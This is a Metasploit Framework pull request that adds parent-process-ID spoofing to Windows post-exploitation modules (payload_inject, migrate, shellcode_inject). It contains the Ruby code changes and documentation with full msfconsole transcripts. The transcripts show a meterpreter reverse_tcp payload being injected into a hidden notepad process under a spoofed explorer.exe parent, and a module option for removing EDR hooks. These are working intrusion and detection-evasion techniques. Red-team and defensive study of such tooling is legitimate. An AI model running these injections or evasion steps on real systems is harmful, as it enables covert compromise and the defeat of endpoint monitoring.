### PR TITLE
Add support for PPID spoofing

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -26,7 +26,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.83)
+      metasploit-payloads (= 1.3.84)
       metasploit_data_models (= 3.0.10)
       metasploit_payloads-mettle (= 0.5.16)
       mqtt
@@ -207,7 +207,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.83)
+    metasploit-payloads (1.3.84)
     metasploit_data_models (3.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

--- a/documentation/modules/exploit/windows/local/payload_inject.md
+++ b/documentation/modules/exploit/windows/local/payload_inject.md
@@ -1,0 +1,238 @@
+## Description
+
+This module leverages the reflective ddl injection technique to spawn a payload thread in the memory of another running process.
+To inject into the memory of another process, the meterpreter session must have the required permissions to allocate memory
+and create a remote thread in the process.  The architecture of the payload must match the architecture of the process into
+which it is injected.  If no process is specified, the module will launch a notepad process matching the architecture of the
+selected payload then inject into it.
+
+## Side-Effects
+The `PPID` option can crash certain processes when used.  To use the PPID feature, the meterpreter session must have permission to
+access the process identified by the `PPID` and the process may also have attributes that limit the ability to use it as a `PPID`.  Certain
+Windows Metro apps like Calc or Edge will crash if you try and use them as the `PPID`.
+
+## Options
+```
+msf5 exploit(windows/local/payload_inject) > show options
+
+Module options (exploit/windows/local/payload_inject):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   AUTOUNHOOK   false            no        Auto remove EDRs hooks
+   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
+   PPID         3632             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
+   SESSION      1                yes       The session to run this module on.
+   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed
+```
+
+## Vulnerable Target
+
+This module only works on Windows hosts.
+
+## Usage
+1. Create a meterpreter session on the remote host
+2. Begin interacting with the module: `use exploit/windows/local/payload_inject`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenarios
+### Windows 10x64 Build 17134 No PID
+```
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:5555 
+WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
+WARNING: Local files may be incompatible with the Metasploit Framework
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49673) at 2020-01-22 13:10:13 -0600
+WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
+WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject 
+msf5 exploit(windows/local/payload_inject) > show options
+
+Module options (exploit/windows/local/payload_inject):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   AUTOUNHOOK   false            no        Auto remove EDRs hooks
+   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
+   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
+   SESSION                       yes       The session to run this module on.
+   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf5 exploit(windows/local/payload_inject) > set session 1
+session => 1
+msf5 exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/payload_inject) > set lhost 192.168.135.168
+lhost => 192.168.135.168
+msf5 exploit(windows/local/payload_inject) > show options
+
+Module options (exploit/windows/local/payload_inject):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   AUTOUNHOOK   false            no        Auto remove EDRs hooks
+   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
+   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
+   SESSION      1                yes       The session to run this module on.
+   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf5 exploit(windows/local/payload_inject) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Running module against DESKTOP-D1E425Q
+[*] Spawned Notepad process 684
+[*] Injecting payload into 684
+[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 684
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49676) at 2020-01-22 13:12:07 -0600
+
+meterpreter > ps
+
+Process List
+============
+
+ PID   PPID  Name                         Arch  Session  User                     Path
+ ---   ----  ----                         ----  -------  ----                     ----
+ 0     0     [System Process]                                                     
+ 4     0     System                                                               
+ 88    4     Registry                                                             
+.
+.
+.
+ 684   7524  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
+.
+.
+.
+ 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
+ 7532  4772  chrome.exe                   x64   1        DESKTOP-D1E425Q\msfuser  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ 7876  780   WmiPrvSE.exe                                                         
+ 7904  780   WmiPrvSE.exe                                                         
+ 8000  584   svchost.exe                                                          
+ 8036  584   svchost.exe                                                          
+
+meterpreter > getpid
+Current pid: 684
+meterpreter > 
+
+```
+
+### Windows 10x64 Build 17134 No PID
+```
+msf5 exploit(windows/local/payload_inject) > set PPID 3632
+PPID => 3632
+msf5 exploit(windows/local/payload_inject) > show options
+
+Module options (exploit/windows/local/payload_inject):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   AUTOUNHOOK   false            no        Auto remove EDRs hooks
+   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
+   PPID         3632             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
+   SESSION      1                yes       The session to run this module on.
+   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf5 exploit(windows/local/payload_inject) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Running module against DESKTOP-D1E425Q
+[*] Spawned Notepad process 1528
+[*] Spoofing PPID 3632
+[*] Injecting payload into 1528
+[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 1528
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49677) at 2020-01-22 13:16:31 -0600
+
+meterpreter > getpid
+Current pid: 1528
+meterpreter > ps
+
+Process List
+============
+
+ PID   PPID  Name                         Arch  Session  User                     Path
+ ---   ----  ----                         ----  -------  ----                     ----
+ 0     0     [System Process]                                                     
+ 4     0     System                                                               
+ 88    4     Registry                                                             
+.
+.
+.
+ 1528  3632  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
+.
+.
+.
+ 3632  3452  explorer.exe                 x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\explorer.exe
+.
+.
+.
+ 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
+ 7532  4772  chrome.exe                   x64   1        DESKTOP-D1E425Q\msfuser  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ 7904  780   WmiPrvSE.exe                                                         
+ 7996  780   RuntimeBroker.exe            x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\RuntimeBroker.exe
+ 8000  584   svchost.exe                                                          
+ 8036  584   svchost.exe                                                          
+
+meterpreter > 
+
+
+```

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -141,6 +141,11 @@ class Process < Rex::Post::Process
       if (opts['Subshell'])
         flags |= PROCESS_EXECUTE_FLAG_SUBSHELL
       end
+      if (opts['ParentPid'])
+        request.add_tlv(TLV_TYPE_PARENT_PID, opts['ParentPid']);
+        request.add_tlv(TLV_TYPE_PROCESS_PERMS, PROCESS_ALL_ACCESS)
+        request.add_tlv(TLV_TYPE_INHERIT, false)
+      end
       inmem = opts['InMemory']
       if inmem
 
@@ -424,4 +429,3 @@ class ProcessList < Array
 end
 
 end; end; end; end; end; end
-

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.3.83'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.3.84'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.5.16'
   # Needed by msfgui and other rpc components

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -77,6 +77,8 @@ class MetasploitModule < Msf::Exploit::Local
     if datastore['PPID'] and not has_pid?(datastore['PPID'])
       print_error("Process #{datastore['PPID']} was not found")
       return false
+    elsif datastore['PPID']
+      print_status("Spoofing PPID #{datastore['PPID']}")
     end
 
     unless arch_check(@payload_arch, proc.pid)

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Local
     # syinfo is only on meterpreter sessions
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
-    if datastore['PPID'] and datastore['PID']
+    if datastore['PPID'] != 0 and datastore['PID'] != 0
       print_error("PID and PPID are mutually exclusive")
       return false
     end
@@ -74,10 +74,10 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
-    if datastore['PPID'] and not has_pid?(datastore['PPID'])
+    if datastore['PPID'] != 0 and not has_pid?(datastore['PPID'])
       print_error("Process #{datastore['PPID']} was not found")
       return false
-    elsif datastore['PPID']
+    elsif datastore['PPID'] != 0
       print_status("Spoofing PPID #{datastore['PPID']}")
     end
 

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -38,6 +38,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options(
       [
         OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload. 0=New Process', 0]),
+        OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)', 0]),
         OptBool.new('AUTOUNHOOK', [false, 'Auto remove EDRs hooks', false]),
         OptInt.new('WAIT_UNHOOK', [true, 'Seconds to wait for unhook to be executed', 5])
       ])
@@ -62,10 +63,20 @@ class MetasploitModule < Msf::Exploit::Local
     # syinfo is only on meterpreter sessions
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
+    if datastore['PPID'] and datastore['PID']
+      print_error("PID and PPID are mutually exclusive")
+      return false
+    end
+
     proc = get_proc(datastore['PID'])
     if not proc
       print_error("Unable to get a proper PID")
       return
+    end
+
+    if datastore['PPID'] and not has_pid?(datastore['PPID'])
+      print_error("Process #{datastore['PPID']} was not found")
+      return false
     end
 
     unless arch_check(@payload_arch, proc.pid)
@@ -92,7 +103,10 @@ class MetasploitModule < Msf::Exploit::Local
     if pid == 0
       notepad_pathname = get_notepad_pathname(@payload_arch, client.sys.config.getenv('windir'), client.arch)
       vprint_status("Starting  #{notepad_pathname}")
-      proc = client.sys.process.execute(notepad_pathname, nil, {'Hidden' => datastore['HIDDEN']})
+      proc = client.sys.process.execute(notepad_pathname, nil, {
+        'Hidden' => datastore['HIDDEN'],
+        'ParentPid' => datastore['PPID']
+      })
       if proc.nil?
         print_bad("Failed to start notepad process")
       else

--- a/modules/post/windows/manage/migrate.rb
+++ b/modules/post/windows/manage/migrate.rb
@@ -4,6 +4,8 @@
 ##
 
 class MetasploitModule < Msf::Post
+  include Msf::Post::Common
+  include Msf::Post::Windows::Process
 
   def initialize(info={})
     super( update_info( info,
@@ -12,15 +14,20 @@ class MetasploitModule < Msf::Post
         to another. A given process PID to migrate to or the module can spawn one and
         migrate to that newly spawned process.},
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
+      'Author'        => [
+        'Carlos Perez <carlos_perez[at]darkoperator.com>',
+        'phra <https://iwantmore.pizza>'
+      ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ]
     ))
 
     register_options(
       [
-        OptBool.new(   'SPAWN',[ false,'Spawn process to migrate to. If name for process not given notepad.exe is used.', true]),
-        OptInt.new(    'PID',  [false, 'PID of process to migrate to.']),
+        OptBool.new(   'SPAWN',[false,'Spawn process to migrate to. If set, notepad.exe is used.', true]),
+        OptInt.new(    'PID',  [false, 'PID of process to migrate to.', 0]),
+        OptInt.new(    'PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),
+        OptString.new( 'PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),
         OptString.new( 'NAME', [false, 'Name of process to migrate to.']),
         OptBool.new(   'KILL', [false, 'Kill original process for the session.', false])
       ])
@@ -36,22 +43,21 @@ class MetasploitModule < Msf::Post
 
     target_pid = nil
 
-    if datastore['SPAWN']
-      print_status("Spawning notepad.exe process to migrate to")
+    if datastore['SPAWN'] and datastore['SPAWN'] != ""
       target_pid = create_temp_proc
-    elsif datastore['PID']
+    elsif datastore['PID'] and datastore['PID'] != 0
       target_pid = datastore['PID']
-    elsif datastore['NAME']
+    elsif datastore['NAME'] and datastore['NAME'] != ""
       target_pid = session.sys.process[datastore['NAME']]
     end
 
     if not target_pid or not has_pid?(target_pid)
-      print_error("Process or PID not found")
+      print_error("Process #{target_pid} not found")
       return
     end
 
     begin
-      print_good("Migrating to #{target_pid}")
+      print_status("Migrating to #{target_pid}")
       session.core.migrate(target_pid)
       print_good("Successfully migrated to process #{target_pid}")
     rescue ::Exception => e
@@ -61,17 +67,35 @@ class MetasploitModule < Msf::Post
 
     if datastore['KILL']
       print_status("Killing original process with PID #{original_pid}")
-      session.sys.process.kill(original_pid)
-      print_good("Successfully killed process with PID #{original_pid}")
+      if has_pid?(original_pid)
+        session.sys.process.kill(original_pid)
+        print_good("Successfully killed process with PID #{original_pid}")
+      else
+        print_warning("PID #{original_pid} exited on its own")
+      end
     end
   end
 
   # Creates a temp notepad.exe to migrate to depending the architecture.
   def create_temp_proc()
-    # Use the system path for executable to run
-    cmd = "notepad.exe"
+    target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']
+    cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)
+
+    print_status("Spawning notepad.exe process to migrate to")
+
+    if target_ppid != 0 and not has_pid?(target_ppid)
+      print_error("Process #{target_ppid} not found")
+      return
+    elsif has_pid?(target_ppid)
+      print_status("Spoofing PPID #{target_ppid}")
+    end
+
     # run hidden
-    proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    proc = session.sys.process.execute(cmd, nil, {
+      'Hidden' => true,
+      'ParentPid' => target_ppid
+    })
+
     return proc.pid
   end
 end

--- a/modules/post/windows/manage/shellcode_inject.rb
+++ b/modules/post/windows/manage/shellcode_inject.rb
@@ -57,20 +57,20 @@ class MetasploitModule < Msf::Post
       fail_with(Failure::BadConfig, "Cannot inject a 64-bit payload into any process on a 32-bit OS")
     end
 
-    if datastore['PPID'] and datastore['PID']
+    if datastore['PPID'] != 0 and datastore['PID'] != 0
       print_error("PID and PPID are mutually exclusive")
       return false
     end
 
     # Start Notepad if Required
     if pid == 0
-      if ppid and not has_pid?(ppid)
+      if ppid != 0 and not has_pid?(ppid)
         print_error("Process #{ppid} was not found")
         return false
-      elsif ppid
+      elsif ppid != 0
         print_status("Spoofing PPID #{ppid}")
       end
-      print_status("Spoofing PPID #{ppid}")
+
       notepad_pathname = get_notepad_pathname(bits, client.sys.config.getenv('windir'), client.arch)
       vprint_status("Starting  #{notepad_pathname}")
       proc = client.sys.process.execute(notepad_pathname, nil, {

--- a/modules/post/windows/manage/shellcode_inject.rb
+++ b/modules/post/windows/manage/shellcode_inject.rb
@@ -83,6 +83,8 @@ class MetasploitModule < Msf::Post
     else
       if datastore['CHANNELIZED'] && datastore['PID'] != 0
         fail_with(Failure::BadConfig, "It's not possible to retrieve output when injecting existing processes!")
+      elsif datastore['CHANNELIZED'] && datastore['PPID'] != 0
+        fail_with(Failure::BadConfig, "It's not possible to retrieve output when using PPID spoofing!")
       end
       unless has_pid?(pid)
         print_error("Process #{pid} was not found")

--- a/modules/post/windows/manage/shellcode_inject.rb
+++ b/modules/post/windows/manage/shellcode_inject.rb
@@ -67,6 +67,8 @@ class MetasploitModule < Msf::Post
       if ppid and not has_pid?(ppid)
         print_error("Process #{ppid} was not found")
         return false
+      elsif ppid
+        print_status("Spoofing PPID #{ppid}")
       end
       print_status("Spoofing PPID #{ppid}")
       notepad_pathname = get_notepad_pathname(bits, client.sys.config.getenv('windir'), client.arch)


### PR DESCRIPTION
will fix https://github.com/rapid7/metasploit-payloads/issues/373

requires https://github.com/rapid7/metasploit-payloads/pull/374

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] spawn meterpreter
- [x] `use exploit/windows/local/payload_inject`
- [x] `set payload windows/x64/meterpreter/reverse_https`
- [x] `set lhost ...`
- [x] `set lport ...`
- [x] `set PPID ...` (PPID to spoof for new agent)
- [x] a new agent is spawned under the specified PPID

